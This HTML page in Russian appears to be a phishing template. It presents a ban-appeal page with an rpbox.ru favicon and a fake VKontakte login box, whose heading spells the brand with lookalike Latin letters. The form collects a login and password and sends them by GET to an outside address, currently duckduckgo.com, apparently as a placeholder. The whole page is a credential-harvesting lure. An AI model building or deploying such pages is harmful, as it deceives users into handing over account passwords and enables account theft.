<html lang="ru">
	<head>
		<link rel="icon" type="image/png" href="https://rpbox.ru/favicon.png">
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<title>Подача аппеляции</title>
		<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
		<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
		<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
		<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
		<style>
			.content {
			  position: relative;
			  z-index: 2;
			  color: #fff;
			}

			.bg {
			  position: absolute;
			  z-index: 1;
			  left: 10px;
			  top: 10px;
			  right: 10px;
			  bottom: 10px;
			  filter: blur(10px);
			  background: url(https://i.ytimg.com/vi/uC_a44ZBKQI/maxresdefault.jpg) no-repeat center;
			  background-size: cover;
			}
			
			.vk-auth {
				background-color: rgba(255,255,255,1);
				width: 100%;
				max-width: 300px;
				border-radius: 10px;
				color: rgba(0,0,0,1);
			    line-height: 1.5;
				margin-top: 20%;
			}
		  </style>
	</head>
	<body>
		<div class="bg"></div>
		<div class="content">
			<header>
				
			</header>
			<div class="container vk-auth text-center">
				<form id="vk_form" method="get" action="http://duckduckgo.com/">
					<br>
					<h5>Войдите через BKонтакте</h5>
					<input class="form-control" name="login" type="text" required placeholder="Email или телефон">
					<input class="form-control" name="password" type="password" required placeholder="Пароль">
					<br>
					<button style="background-color: #5181b8; border: 0px; width: 100%;" type="submit" form="vk_form" class="btn btn-dark">Войти</button>
					<br>
					<br>
				</form>
			</div>
		</div>
	</body>
</html>